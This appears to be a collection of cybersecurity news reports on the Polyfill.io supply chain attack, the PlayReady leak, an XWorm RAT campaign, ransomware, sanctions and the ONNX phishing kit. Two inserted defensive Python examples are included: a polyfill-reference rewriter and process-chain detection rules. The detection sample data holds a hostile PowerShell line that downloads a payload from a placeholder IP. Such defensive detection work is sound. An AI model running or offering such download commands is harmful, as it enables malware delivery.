Researchers stated that the injected malware is dynamically generated based on HTTP headers, which makes it difficult to detect and lets it use different attack vectors depending on the visitor. The Polyfill injection is a classic example of a supply chain attack against a widely used library.

Image: at least 104183 websites might be affected. (Source: publicwww.com)

Researchers from Sansec decoded one variant that redirects mobile users to a sports betting site using a fake Google Analytics domain. The malware employs evasion techniques and defenses against reverse engineering, including:
- Activating only on specific mobile devices at certain hours
- Avoiding execution when an admin user is detected
- Delaying activation when web analytics services are present
Mitigation and Recommendations
Andrew Betts, the original Polyfill author, took to X to advise against using Polyfill altogether, stating that modern browsers no longer require it. He added that he had no influence over the sale of the project and was never in possession of the new domain, and cautioned that websites that serve third-party scripts are a huge security concern.

Image sources: X.com (@triblondon)

Experts have set up a domain (polykill.io) to warn about the compromise of the project and have recommended the following steps for website owners:
- Immediately remove usage of cdn.polyfill.io from websites and projects.
- Replace it with a secure alternative such as those offered by Fastly and Cloudflare. Fastly saved and hosts an earlier version of the project's codebase (https://polyfill-fastly.io/) from before its sale to Funnull.
"There are many risks associated with allowing an unknown foreign entity to manage and serve JavaScript within your web application. They can quietly observe user traffic, and if malicious intent were taken, they can potentially steal usernames, passwords and credit card information directly as users enter the information in the web browser."

Cloudflare also published its findings and recommendations in response to concerns over the compromise of the domain. The company stated in a blog article:

"The concerns are that any website embedding a link to the original polyfill.io domain will now be relying on Funnull to maintain and secure the underlying project to avoid the risk of a supply chain attack. Such an attack would occur if the underlying third party is compromised or alters the code being served to end users in nefarious ways, causing, by consequence, all websites using the tool to be compromised."

This incident serves as a stark reminder of the security implications of relying on external code libraries and third-party scripts, of the importance of vigilance in maintaining website integrity, and of the potential for malicious takeover of massively deployed projects.
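As an added illustration of the two remediation steps recommended above (this is example code written for this article, not code from the article, polykill.io, Fastly or Cloudflare), the following Python finds every script and link reference to the polyfill.io domain in a page and rewrites it to a replacement host. The sample page is constructed, the default replacement host is the Fastly mirror named above, and the function names are this example's own.

```python
"""Find and rewrite references to the compromised polyfill.io domain.

Added example for this article; not code from the article, polykill.io,
Fastly or Cloudflare. The sample page below is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed replacement host (the Fastly mirror mentioned above). Any host you
# pick is still a third party; self-hosting the bundle is the stricter choice.
SAFE_HOST = "polyfill-fastly.io"


def _is_polyfill_host(host: str) -> bool:
    """True for polyfill.io and any of its subdomains (cdn.polyfill.io, ...),
    but not for look-alikes such as polyfill.io.example.net."""
    return host == "polyfill.io" or host.endswith(".polyfill.io")


def _split(url: str):
    # Protocol-relative URLs ("//cdn.polyfill.io/...") carry no scheme;
    # urlsplit only fills in netloc once one is prepended.
    return urlsplit("https:" + url if url.startswith("//") else url)


class _RefCollector(HTMLParser):
    """Collects the URLs of <script src> and <link href> tags in document order."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        wanted = {"script": "src", "link": "href"}.get(tag)
        for name, value in attrs:
            if name == wanted and value:
                self.refs.append(value)


def find_polyfill_references(markup: str) -> list:
    """Return every script/link URL on the page whose host is polyfill.io."""
    collector = _RefCollector()
    collector.feed(markup)
    return [u for u in collector.refs if _is_polyfill_host(_split(u).hostname or "")]


def rewrite_references(markup: str, safe_host: str = SAFE_HOST) -> str:
    """Swap the polyfill.io host for safe_host, keeping path and query intact.

    HTMLParser unescapes attribute values, so a query string written with
    &amp; in the source would not be matched verbatim by this plain replace."""
    for url in find_polyfill_references(markup):
        new_url = url.replace(_split(url).netloc, safe_host, 1)
        markup = markup.replace(url, new_url)
    return markup


# Constructed sample page: two polyfill.io loads (one protocol-relative)
# and one unrelated CDN script that must be left alone.
SAMPLE_HTML = """<!doctype html>
<html><head>
<script src="https://cdn.polyfill.io/v3/polyfill.min.js?features=default"></script>
<script src="//polyfill.io/v3/polyfill.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/vue@3"></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for url in find_polyfill_references(SAMPLE_HTML):
        print("flagged:", url)
    print(rewrite_references(SAMPLE_HTML))
```

The rewrite only moves the dependency to another third party; self-hosting the polyfill bundle removes it. Subresource Integrity is not a substitute check here, because polyfill services tailor the returned script to the requesting User-Agent, so no single hash would match.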
Microsoft Engineer Accidentally Leaked 4GB of PlayReady DRM Internal Code Used To Protect Streaming Services
PlayReady DRM Internal Code Leak
In early June, a Microsoft engineer published information about an Apple TV service crash on a Surface Pro 9 device in a public forum. The shared data included a 771MB file attachment that, on extraction, revealed 4GB of internal code related to Microsoft PlayReady.

Image: original post before deletion (Source: security-explorations.com)

The leaked PlayReady data is said to include:
1. WarBird configurations for creating the PlayReady library
2. WarBird libraries for code obfuscation functions
3. Libraries with symbolic information related to PlayReady

Image: partial directory view of leaked data (Source: security-explorations.com)

HD Keys Could Be Decrypted
Researchers from cybersecurity company AG Security Research Lab successfully built the required Windows PlayReady DLL from the leaked internal code, aided by step-by-step instructions provided by another user on the same forum. Their investigation uncovered several deficiencies in the Protected Media Path (PMP) components of PlayReady, which could be exploited to access plaintext content keys secured by the system on Windows 10 and 11. The researchers demonstrated that these extracted keys could decrypt high-definition movies protected by PlayReady. Notably, the weakness persists even on systems with hardware DRM capability, as that feature can be easily disabled. The root cause appears to lie in the software DRM implementation used by default on Windows 10 systems without hardware DRM capability. Given that Windows 10 still holds a 69% market share worldwide, this could affect a significant number of users until the operating system's retirement in October 2025. The team also demonstrated that the technique used to extract plaintext content keys could work for other platforms relying on software (SW) Microsoft PlayReady in a Windows OS environment.

Implications and Microsoft's Response
The researchers notified Microsoft about the leak on June 12, 2024. While Microsoft removed the forum post within 12 hours, the download link reportedly remained active. On June 26, MSRC told the researchers that it had conducted an investigation and determined that the incident did not constitute a service vulnerability, as the post had already been taken down. The researchers confirmed that the download link is no longer active. The incident highlights the ongoing challenge of maintaining the security and secrecy of DRM implementations. It also underscores the importance of following guidelines for handling sensitive information in public forums, as the leak violated Microsoft's own guidelines for publicly posting reproduction information. These guidelines specify:
- All information in reports and any comments and replies are publicly visible by default.
- Don't put anything you want to keep private in the title or content of the initial report, which is public.
- To maintain your privacy and keep your sensitive information out of public view, exercise caution.
Major Streaming Services Potentially Affected
The same research team had earlier tested Microsoft's Protected Media Path and found that several streaming platforms were affected by vulnerabilities within the environment: Canal+ Online, Netflix, HBO Max, Amazon Prime Video, Sky Showtime, and others. DRM protection is crucial to the video streaming industry, valued at $544 billion, which makes this breach a matter of serious concern. Microsoft reportedly expressed interest, over its MSRC channel, in a full disclosure of the stated vulnerabilities with technical details and a proof of concept, offering potential rewards. The researchers declined, saying that a full disclosure would have to be part of a commercial agreement, since it would jeopardize their own confidential technology and tools as well as future research on the Windows operating system. The researchers also believe Microsoft should conduct a more comprehensive review of its Protected Media Path environment, which could lead to the discovery and fixing of additional issues, rather than focusing on a single exploit.
Cyber Attack Forces South Africa’s National Health Laboratory Service To Shut Down Systems
Impact on South Africa's National Health Laboratory Service
NHLS Chief Executive Officer Prof Koleka Mlisana informed staff of the incident in a memo, stating that the breach had caused damage and that the organization was treating the matter with extreme urgency and concern. Mlisana stated, “I regret to inform you that our IT systems are unavailable due to a suspected incident that occurred over the weekend.” Mlisana assured staff that the organization's Incident Response Team was working around the clock to determine the scope of the intrusion and deploy the necessary safeguards to secure systems and data. The NHLS has implemented its "Downtime Protocol" to minimize disruption to services, prioritizing patients' samples and processing, with results communicated directly to clinicians whenever urgent. The cyber attack comes at a critical time for South Africa's healthcare system. The country is currently grappling with an Mpox outbreak, and the NHLS was already facing a significant backlog in toxicology tests as of March. The shutdown of IT systems is likely to exacerbate these challenges. Mzi Gcukumana, the NHLS Communication, Marketing, and PR officer, disclosed: “Preliminary investigation suggests that our Enterprise Resource Planning (Oracle) environment, Laboratory Information System (LIS) (TrakCare) database, and CDW are not affected. Therefore, no patient data has been lost or compromised. All patient data is safe."

Response and Recovery Efforts
“Please rest assured that our priority focus is on data security. We are determined to solve this issue swiftly and transparently,” Mlisana stated to patients. In response to the breach, the NHLS has deployed its Incident Response Team to assess the scope of the intrusion and implement the necessary safeguards. Mlisana assured staff that the team is working around the clock to secure systems and data. “I want to take this opportunity to thank you in advance as we all put in our efforts to ensure that disruption to our services is minimised,” Mlisana added. The NHLS has determined that certain sections of its systems, including its backup server, were deleted, requiring the affected systems to be rebuilt. Gcukumana stated, “All users will be aware that the NHLS networked laboratory system is heavily reliant on these information technology systems that have been disrupted.” He added, “Unfortunately, this will take time, and investigations thus far have not advanced enough for us to give a timeframe for the restoration of our systems and full service. All stakeholders and the public will be informed as soon as more information becomes available.” The National Department of Health, which oversees the NHLS, has been informed of the incident. A spokesperson for the department called for patience as efforts to resolve the issue continue. As the investigation unfolds, the NHLS has promised regular updates on the compromise and ongoing response activities. The organization emphasizes its commitment to data security and a swift, transparent resolution of the issue.

Russian Hackers Target Ukraine with XWorm RAT Malware Payload
Technical Overview of XWorm RAT Campaign
The campaign begins with a malicious LNK shortcut file, disguised as a legitimate Excel document, which runs a PowerShell script when opened. The script downloads two files, "pkg.zip" and "NewCopy.xlsx", from a specified URL. The LNK file then launches "pythonw.exe" via the start command, which copies files into a new folder. This "pythonw.exe" loads a malicious DLL, "python310.dll", through DLL sideloading: a malicious library masquerades as a legitimate one, so the attackers' code runs under the guise of trusted software. The loaded DLL then injects shellcode into the MSBuild process.

Image source: Cyble

The attackers also employ a tool called Shadowloader to inject the XWorm RAT into a running process, further obscuring its presence. Once executed, XWorm offers a range of capabilities, including data theft, DDoS attacks, and cryptocurrency address manipulation. The malware attempts to connect to a Command-and-Control (C&C) server, but at the time of analysis the server was inactive, so no further malicious activity was observed.

Image source: Cyble

While the initial infection vector remains unclear, researchers suspect phishing emails play a role. The intended victim could not be determined from the Excel lure used in the campaign. CRIL researchers had previously observed the UAC-0184 threat actor group employing lures tailored to Ukrainian targets, often mimicking official government or utility communications.

Protecting Against XWorm RAT
The XWorm RAT used in the campaign is designed to be accessible even to threat actors lacking sophistication and technical expertise. The malware offers several functions, including data theft, DDoS attacks, cryptocurrency address manipulation, ransomware deployment, and downloading additional malware onto compromised systems. Cyble researchers have recommended several measures to defend against this campaign:
- Implement strong email filtering to block malicious attachments.
- Exercise caution with email attachments, especially from unknown senders.
- Limit execution of scripting languages where possible.
- Use application whitelisting to control which programs can run.
- Deploy robust antivirus and anti-malware solutions.
- Enforce strong, unique passwords and two-factor authentication.
- Monitor networks for unusual activity or data exfiltration attempts.
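The execution chain described above (LNK lure, PowerShell download, a relocated pythonw.exe sideloading python310.dll, injection into MSBuild) gives a detection engineer four process-lineage and image-load conditions to alert on, which is what the last recommendation amounts to in practice. The following Python is an added example, not Cyble's or CRIL's code: it runs those four checks over constructed Sysmon-style process-creation and image-load events. The event field names, the list of user-writable directory markers, the download-cmdlet list, the TEST-NET download address and the benign control events are all assumptions made for the illustration.

```python
"""Detection logic for the XWorm delivery chain, run over constructed
Sysmon-style events. Added example; not Cyble's or CRIL's code."""
from dataclasses import dataclass
import ntpath

# Assumed: path fragments that mark directories an unprivileged user can write to.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")
# Assumed: command-line fragments typical of PowerShell stage downloaders.
DOWNLOAD_CMDLETS = ("invoke-webrequest", "iwr ", "downloadfile", "downloadstring",
                    "start-bitstransfer", "curl ", "wget ")


@dataclass
class Alert:
    rule: str
    event: dict


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def check_event(ev: dict) -> list:
    """Return the alerts a single event triggers (possibly none)."""
    alerts = []
    if ev.get("event") == "process_create":
        image = _basename(ev["image"])
        parent = _basename(ev.get("parent_image", ""))
        cmd = ev.get("command_line", "").lower()
        # Stage 1: the LNK lure makes explorer.exe spawn a downloading PowerShell.
        if image in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" \
                and any(c in cmd for c in DOWNLOAD_CMDLETS):
            alerts.append(Alert("powershell_download_from_explorer", ev))
        # Stage 2: a copy of pythonw.exe running from a user-writable folder.
        if image == "pythonw.exe" and _in_user_writable(ev["image"]):
            alerts.append(Alert("pythonw_from_user_writable_path", ev))
        # Stage 4: the injection target has the interpreter as its parent.
        if image == "msbuild.exe" and parent in ("pythonw.exe", "python.exe"):
            alerts.append(Alert("msbuild_spawned_by_python", ev))
    elif ev.get("event") == "image_load":
        loaded = _basename(ev["loaded_image"])
        # Stage 3: python3xx.dll sideloaded from a user-writable folder into pythonw.exe.
        if loaded.startswith("python3") and loaded.endswith(".dll") \
                and _in_user_writable(ev["loaded_image"]) and _basename(ev["image"]) == "pythonw.exe":
            alerts.append(Alert("python_dll_sideload", ev))
    return alerts


def scan(events) -> list:
    """Run every event through the rules and return all alerts in order."""
    return [alert for ev in events for alert in check_event(ev)]


# Constructed events: the four-stage chain followed by benign controls
# (a normal Python install and an ordinary interactive PowerShell).
SAMPLE_EVENTS = [
    {"event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -w hidden -c Invoke-WebRequest http://203.0.113.10/pkg.zip -OutFile $env:TEMP\pkg.zip"},
    {"event": "process_create", "image": r"C:\Users\victim\AppData\Local\Temp\pkg\pythonw.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "command_line": "pythonw.exe"},
    {"event": "image_load", "image": r"C:\Users\victim\AppData\Local\Temp\pkg\pythonw.exe",
     "loaded_image": r"C:\Users\victim\AppData\Local\Temp\pkg\python310.dll"},
    {"event": "process_create",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent_image": r"C:\Users\victim\AppData\Local\Temp\pkg\pythonw.exe",
     "command_line": "MSBuild.exe"},
    {"event": "process_create", "image": r"C:\Program Files\Python310\pythonw.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "pythonw.exe script.py"},
    {"event": "image_load", "image": r"C:\Program Files\Python310\pythonw.exe",
     "loaded_image": r"C:\Program Files\Python310\python310.dll"},
    {"event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "powershell.exe Get-ChildItem"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert.rule, "<-", alert.event["image"])
```

Each rule on its own is a heuristic (developers do run Python from their home directories), so the value is in the correlation: the same host producing stages 1 through 4 in sequence is the signal worth paging on.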
EU Issues New Sanctions Against Russia-Linked Threat Actors
Russian Military Intelligence and FSB Operative Sanctions
The sanctions will take effect following publication in the Official Journal of the European Union. The council document justified the new sanctions as a response to the ongoing war between Russia and Ukraine and the cyber activities accompanying it:

"The use of cyber operations that have enabled and accompanied Russia’s unprovoked and unjustified war of aggression against Ukraine affects global stability and security, represents an important risk of escalation, and adds to the already significant increase of malicious cyber activities outside the context of armed conflict over recent years. The growing cybersecurity risks and an overall complex cyber threat landscape, with a clear risk of rapid spill-over of cyber incidents from one Member State to others, and from third countries to the Union, further call for restrictive measures under Decision (CFSP) 2019/797."

Among those sanctioned are Ruslan Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets, both identified as members of the "Callisto group" linked to Russian military intelligence. The group, also known as "Seaborgium" or "Star Blizzard," is accused of conducting multi-year phishing campaigns to steal credentials and data, targeting individuals and critical state functions in defense and foreign relations. Two Ukrainian nationals, Oleksandr Sklianko and Mykola Chernykh, were sanctioned for their involvement in the "Armageddon" hacker group, allegedly supported by Russia's Federal Security Service (FSB). The group was found carrying out cyberattacks against the Ukrainian government and EU member states using phishing emails and malware campaigns.
Wizard Spider Threat Group Members Sanctioned
The EU also targeted two key players in the Russia-based threat group Wizard Spider: Mikhail Mikhailovich Tsarev and Maksim Sergeevich Galochkin. Both are implicated in deploying the "Conti" and "Trickbot" malware programs, which have caused substantial economic damage in the EU through ransomware campaigns targeting essential services such as healthcare, banking and defense. The EU Council has emphasized the need to protect these vital sectors from cyber threats, which can have devastating consequences for individuals, businesses, and societies as a whole. The Council said the sanctions imposed on these six individuals are a clear message that the EU will not tolerate malicious cyber activities that threaten its security, economy, and democracy. The Council document stated:

"As part of the sustained, tailored and coordinated Union action against persistent cyber threat actors, six natural persons should be included in the list of natural and legal persons, entities and bodies subject to restrictive measures set out in the Annex to Decision (CFSP) 2019/797. Those persons are responsible for, or were involved in, cyberattacks with a significant effect, which constitute an external threat to the Union or its Member States."

The sanctions demonstrate that the EU will continue to work closely with its Member States, international partners, and other stakeholders to address the growing cybersecurity threat landscape escalated by geopolitical tensions.
Apple Fixes ‘Bug’ in Vision Pro That Allowed Hackers To Fill Room with Bugs And Spiders
Spatial Hack in Apple Vision Pro Devices
Apple designed the Vision Pro with strict privacy controls, including limiting apps to a default 'Shared Space' and requiring explicit user consent for more immersive content. Websites must likewise obtain explicit user permission to generate 3D content within a user's physical environment.

Image source: ryanpickren.com

However, security researcher Ryan Pickren discovered that the AR Quick Look feature, introduced in 2018 for iOS, remained active in visionOS without the corresponding safeguards. This oversight allowed websites to use HTML anchor tags to spawn unlimited 3D objects complete with animations and spatial audio. By adding specific anchor tags to a webpage, a malicious site can instruct Safari to render a 3D model without any form of user interaction. "If the victim just views our website in Vision Pro, we can instantly fill their room with hundreds of crawling spiders and screeching bats," Pickren explained. "Freaky stuff," he exclaimed.

Image sources: ryanpickren.com

The researcher stated that the exploit code is straightforward and that closing Safari doesn't get rid of the 3D objects, as they are handled by a separate application. "To make things even freakier – since these animated files are being handled by a separate application (Quick Look), closing Safari does not get rid of them," Pickren noted. He added, "There is no obvious way to get rid of them besides manually running around the room to physically tap each one."

Bug Reporting and Gaps in Vulnerability Assessment
After trying to disclose the flaw to Apple, the researcher felt the tech giant had downplayed its relation to spatial computing and the generation of 3D objects, focusing instead on the potential for system crashes and reboots. The CVE description claimed that the issue had been addressed by improving the file handling protocol, which the researcher believed was unrelated to the bug. This highlights the challenges of triaging and classifying bugs in emerging fields such as spatial computing. The researcher believes the bug's impact goes beyond simple system crashes or reboots, raising questions about the security and privacy of the technology and the need to re-evaluate existing threat models. "Perhaps it's time for Apple to re-evaluate their Vision Pro threat model," Pickren suggested. "This is a deeply personal product and classic vulnerability triaging guidelines may not capture the full impact anymore."
Indonesia National Data Center Hack Disrupts Government Services, Affecting Over 200 Agencies
Authorities Have Detected Samples of LockBit 3.0 Ransomware
Samuel Abrijani Pangerapan, director general of informatics applications at the Communications and Informatics Ministry, confirmed that essential services such as immigration checks at airports had been disrupted. Long lines formed at affected airports after automated passport machines were rendered useless. While some of these services have been restored, including the government's immigration services, efforts continue to restore other critical operations, such as investment licensing. Samuel stated, “We have tried our best to carry out recovery while the (National Cyber and Crypto Agency) is currently carrying out forensics.” The National Cyber and Crypto Agency has detected samples of LockBit 3.0 ransomware, a variant known for encrypting victims' data and demanding payment for its release. PT Telkom Indonesia, an Indonesian multinational telecommunications company, is working with domestic and international authorities and leading the efforts to break the encryption and restore access to the compromised data. Herlan Wijanarko, the company's director of network & IT solutions, confirmed that the attackers had offered a decryption key in exchange for an $8 million ransom.

Experts Concerned About Indonesia Government Infrastructure Security
Cybersecurity experts warn that the severity of the attack exposes significant weaknesses in the government's digital infrastructure and incident response capabilities. Cybersecurity expert Teguh Aprianto described the latest attack as "severe" and noted that it shows the need for improved infrastructure, manpower, and vendor management to prevent such attacks in the future. Teguh stated, "It shows that the government infrastructure, manpower handling this and the vendors are all problematic." In recent years, Indonesia has faced a series of high-profile cyber attacks, including a ransomware attack on its central bank and a data breach at its largest Islamic lender. The consequences of such attacks can be severe, with victims often forced to pay large sums to regain access to their data. Last year, the LockBit ransomware gang claimed responsibility for an attack on Bank Syariah Indonesia in which sensitive information on over 15 million individuals, both customers and employees, was stolen.

ANY.RUN Malware Sandbox Provider’s Employee Email Compromised
ANY.RUN Employee Email Compromise
Image source: X.com (@anyrun_app)

According to a post on X from the company's official handle, the attack originated from a compromised customer account, which was used to send a convincing phishing email to a staff member. This led to unauthorized access to the employee's email account. The attacker then forwarded a phishing message to contacts in the compromised account's address book. ANY.RUN stated that it had already notified the data controllers of affected individuals and is working closely with them to address any concerns. The company emphasized that the compromised employee did not have access to the production environment or any code base, which limits the potential scope of the breach.

ANY.RUN Response and Next Steps
Upon discovering the incident, ANY.RUN took steps to limit the possible compromise and to share details about it. An investigation is ongoing to determine the full impact of the breach and gather additional details. While the comprehensive report is still being prepared, the company has assured its customers that it is taking the matter seriously. In the coming days and weeks, ANY.RUN will:
1. Continue its investigation and analysis of the incident
2. Provide regular updates on its progress
3. Compile a detailed report of its findings

The company acknowledges that many questions remain unanswered at this stage but is committed to keeping all parties informed throughout the process. Customers appear to have viewed the communication effort positively, citing it as an example of transparency in cybersecurity incident reporting and disclosure. The incident is a stark reminder that companies working in the cybersecurity industry remain targets themselves. Last year, Okta, a provider of identity and access management software, suffered a security incident in which attackers used stolen credentials to access its support case management system.
UK’s Sellafield Nuclear Waste Site Pleads Guilty To Cybersecurity Failings
Sellafield Nuclear Waste Site's Cybersecurity Failings
Concerns over the site's security grew after a 2012 report warned of "critical security vulnerabilities" requiring urgent attention. Because of the extreme sensitivity of the issues, the problems were referred to by the codename "Voldemort." While Sellafield has stated there has never been a successful cyberattack, revelations of IT failures last year raised alarms. In an investigative report last year, the Guardian reported that the site had been attacked by threat actors affiliated with the Russian and Chinese governments. The report found that the site's authorities did not know when Sellafield's systems were first compromised, but that breaches may go back as far as 2015, when security experts realized that Sellafield's computer systems had been compromised by sleeper malware. Sellafield had earlier been placed in “special measures” for recurring cybersecurity failings by the UK's Office for Nuclear Regulation (ONR) and security services. The status of the compromised systems is unknown, but the compromise may have led to the theft of sensitive information about the movement of radioactive waste, monitoring for leaks of dangerous material, and fire checks. Sellafield stated that current protections on critical systems are robust, with isolated networks preventing external IT breaches from reaching operational controls. An ONR spokesperson told the Guardian: “We acknowledge that Sellafield Limited has pleaded guilty to all charges," but emphasized that there was no evidence the vulnerabilities led to compromise. A Sellafield spokesman stated in the report, “We have pleaded guilty to all charges and cooperated fully with ONR throughout this process. The charges relate to historic offences and there is no suggestion that public safety was compromised."

Concerns of GMB Trade Union
With attention now focused on improving cyber resilience, officials are working to prevent hackers from disrupting sensitive materials or dangerous nuclear operations. The GMB trade union, which represents tens of thousands of workers across the energy industry, had earlier expressed concerns over security at Sellafield, with its national secretary Andy Prendergast noting a “lack of training and competence among staff, inadequate safety procedures and a culture of fear and intimidation.” Prendergast added, “GMB has repeatedly raised concerns over safety and staffing levels, which are mainly due to turnover and the age and demographic of the workforce.”
CDK Global Struck By Second Cyberattack While Investigating Incident
Incident Extends CDK Global Systems Outage
After the initial attack, CDK Global shut down most of its systems on Wednesday while working to investigate the incident and restore service. "We are actively investigating a cyber incident," the company said. "Out of an abundance of caution and concern for our customers, we have shut down most of our systems and are working diligently to get everything up and running as quickly as possible.” Later the same day, the software firm managed to restore the systems behind its core DMS and Digital Retailing products. In a statement to the Cyber Express, a CDK Global spokesman said:

“As we’ve communicated previously, we are currently investigating a cyber incident. Erring on the side of caution, we proactively shut all systems down and executed extensive testing and consulted with external third-party experts. With the work done so far, our core DMS and Digital Retailing solutions have been restored. We are continuing to conduct extensive tests on all other applications, and we will provide updates as we bring those applications back online. Our first priority is always the security of our customers, and our actions reflect our obligation to them as a trusted partner.”

However, the restoration was short-lived, as the firm experienced a second cyberattack the same day:

“Late in the evening of June 19, we experienced an additional cyber incident and proactively shut down most of our systems. In partnership with third party experts, we are assessing the impact and providing regular updates to our customers. We remain vigilant in our efforts to reinstate our services and get our dealers back to business as usual as quickly as possible.”

According to CNN, sources indicated that the outage could last several days in light of the second cyberattack. The CDK Global outage leaves information on sales deals, negotiations and customer appointments inaccessible to salespeople at affected dealerships.
Incident Comes Ahead of Summer Sales Season
The incident has caused concern among dealers who anticipate strong business during the summer months. “This is where we need systems functioning,” stated Jeff Ramsey, an executive with Ourisman Auto Group, which operates various dealerships. The outage has led dealers to switch to alternative methods of handling sales, such as hand-written buyer's orders. Brian Benstock, general manager of Paragon Honda and Paragon Acura, stated, “My selling team can hand-write a buyer’s order.” Companies such as Kia, Toyota, Stellantis and Ford have also been working on alternate ways to handle customer services during the CDK outage.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
Cyberattack on Ascension Hospitals Led to Lapses in Patient Care Such As Wrongful Administration of Narcotics
Ascension Hospitals Cyberattack Places Strain on Staff
"I had no training for this," said Marvin Ruckle, a neonatal ICU nurse at Ascension Via Christi St. Joseph in Wichita, Kansas, who nearly gave a baby the wrong dose of medication. Lisa Watson, a critical care nurse who works at the same hospital, says she almost administered the wrong drug to a critically ill patient because she couldn't scan it electronically. "My patient probably would have passed away," she said. Doctors and nurses across Ascension report relying on paper records, handwritten notes, faxes and basic spreadsheets to deliver care, many of them cobbled together in real time. An ER doctor in Detroit said a mix-up caused by paperwork issues led a patient to receive the wrong narcotic and end up on a ventilator. In Baltimore, ICU nurse Melissa LaRue described narrowly avoiding an incorrect blood pressure medication dosage because of confusion over paperwork. Several clinicians said such errors could threaten their licenses, but patient privacy laws prevented verification of their accounts. Ascension declined to address specific claims but said in a statement it is "confident that our care providers...continue to provide quality medical care."
Ascension Hospitals' Staff Urge Changes
While federal regulations require safeguarding patient data, hospitals currently face no mandates for cyberattack preparation or prevention. Experts regard health care as the top target for ransomware attacks, which are rising exponentially. Proposed regulations are pending, but timelines and requirements remain unclear. Nurses and doctors urging reforms at Ascension say cyberattacks should be treated like natural disasters, with contingency plans that account for outages lasting weeks or longer. Many also echoed a plea for more staff support to shoulder the additional workload. "We implore Ascension," one Michigan clinician wrote, "to recognize the internal problems that continue to plague its hospitals, both publicly and privately, and take earnest steps toward improving working conditions for all of its staff." While the Biden administration has pushed for stronger cybersecurity standards in health care, the new requirements are still in development. Meanwhile, hospital industry lobbyists argue that mandates could divert resources from cybersecurity efforts. These incidents show that patients may ultimately pay the price when hospitals fall victim to cybercrime, while staff bear an additional burden that affects routine practice and judgement.
Association of Texas Professional Educators Reports Data Breach Affecting Over 414,000 Members
Association of Texas Professional Educators Data Breach
On February 12, 2024, ATPE detected abnormal activity on its network, which led to a comprehensive forensic investigation. The investigation concluded on March 20, 2024, and found evidence that some of ATPE's systems had been accessed by an unauthorized user. Based on this finding, ATPE reviewed the affected systems to identify the specific individuals and types of information that may have been compromised. The accessed information varied depending on when members joined:
- For those who became members before May 15, 2021, the breach may have exposed names, addresses, dates of birth, Social Security numbers and medical records. Tax Identification Numbers could also possibly have been accessed if employers used them as identifiers.
- For members who received payments from ATPE via ACH transactions, financial account information could also have been accessed.
Response to Breach Incident and Credit Offering
Since discovery of the breach, ATPE stated that it has taken several steps to secure its systems, including:
- Disconnecting all access to its network.
- Changing administrative credentials.
- Installing enhanced security safeguards on ATPE's environment and endpoints.
- Restoring ATPE's website in a Microsoft Azure-hosted environment.
Several Chinese APTs Have Been Targeting Telecommunications of Asian Country Since 2021
Malware Variants Used in Chinese Espionage Campaign
Researchers from Symantec observed the use of several custom malware families linked to China-based threat actors, including:
- Coolclient: A backdoor used by the Fireant group, also known as Mustang Panda or Earth Preta, that logs keystrokes and communicates with command servers. The campaign used a version delivered via a trojanized VLC media player.
- Quickheal: A backdoor associated with the Needleminer group, also known as RedFoxtrot or Nomad Panda. The variant used in the campaign was nearly identical to those documented in 2021. It communicated with a command server at swiftandfast[.]net.
- Rainyday: A backdoor tied to the Firefly group, also known as Naikon. Multiple variants were deployed using trojanized executables to sideload malicious loaders and decrypt payloads. At least one loader variant matched those linked to Firefly in 2021.
Campaign Motives and Attribution
The custom malware exclusively used by Fireant, Needleminer and Firefly provides strong evidence that this campaign involves Chinese state-sponsored groups. Firefly has been linked to a Chinese military intelligence unit by the U.S.-China Commission. The level of coordination between the groups involved is unclear, but possibilities include independent action, personnel and tool sharing, or active collaboration. The ultimate motives behind the hacking campaign remain uncertain. Potential objectives include intelligence gathering on the telecommunications sector, eavesdropping on voice and data communications, or developing disruptive capabilities against critical infrastructure. To protect against these threats, telecom operators and other organizations should ensure they have the latest protection updates and implement robust security measures to detect and block malicious files. The researchers shared several indicators of compromise and file hashes to help defenders detect the campaign.
ONNX Store Phishing Kit Leverages QR Codes To Target Financial Sector
ONNX Store Enables Theft of Credentials in Real Time
[Image source: blog.eclecticiq.com]
ONNX Store offers a variety of powerful phishing tools designed to support cybercriminals, including custom phishing pages, webmail servers, 2FA cookie stealers, and "fully undetectable" referral services that use trusted domains to direct victims to phishing landing pages. Researchers from EclecticIQ have noticed that threat actors using the ONNX Store phishing kit tend to distribute PDF files as attachments in phishing emails. Impersonating a reputable service, these documents contain a QR code that directs victims to malicious phishing landing pages. This tactic, known as "quishing," takes advantage of the lack of detection or prevention on employees' personal mobile devices, which are usually left unprotected. The lack of protection on mobile devices also makes these threats harder to monitor. The phishing landing pages aim to steal credentials using the Adversary-in-the-Middle (AiTM) method, which allows real-time capture and transmission of stolen data without the need for frequent HTTP requests. This makes the phishing operation more efficient and harder to detect. The ONNX Store phishing kit uses encrypted JavaScript code that decrypts itself upon page load and includes a basic anti-debugger routine. This adds a layer of protection against phishing scanners and complicates detection. The decrypted JavaScript code collects the victim's network metadata, including browser name, IP address and location, and is designed to steal the 2FA tokens that victims enter. This allows attackers to bypass typical 2FA protection and gain unauthorized access to the victim's account before the token expires. Researchers identified similarities in domain registrant and SSL issuer across the various infrastructures deployed by the ONNX Store phishing kit. These similarities indicated the use of bulletproof hosting services to host the campaign.
Researchers Believe ONNX Store is Rebranding of Caffeine Kit
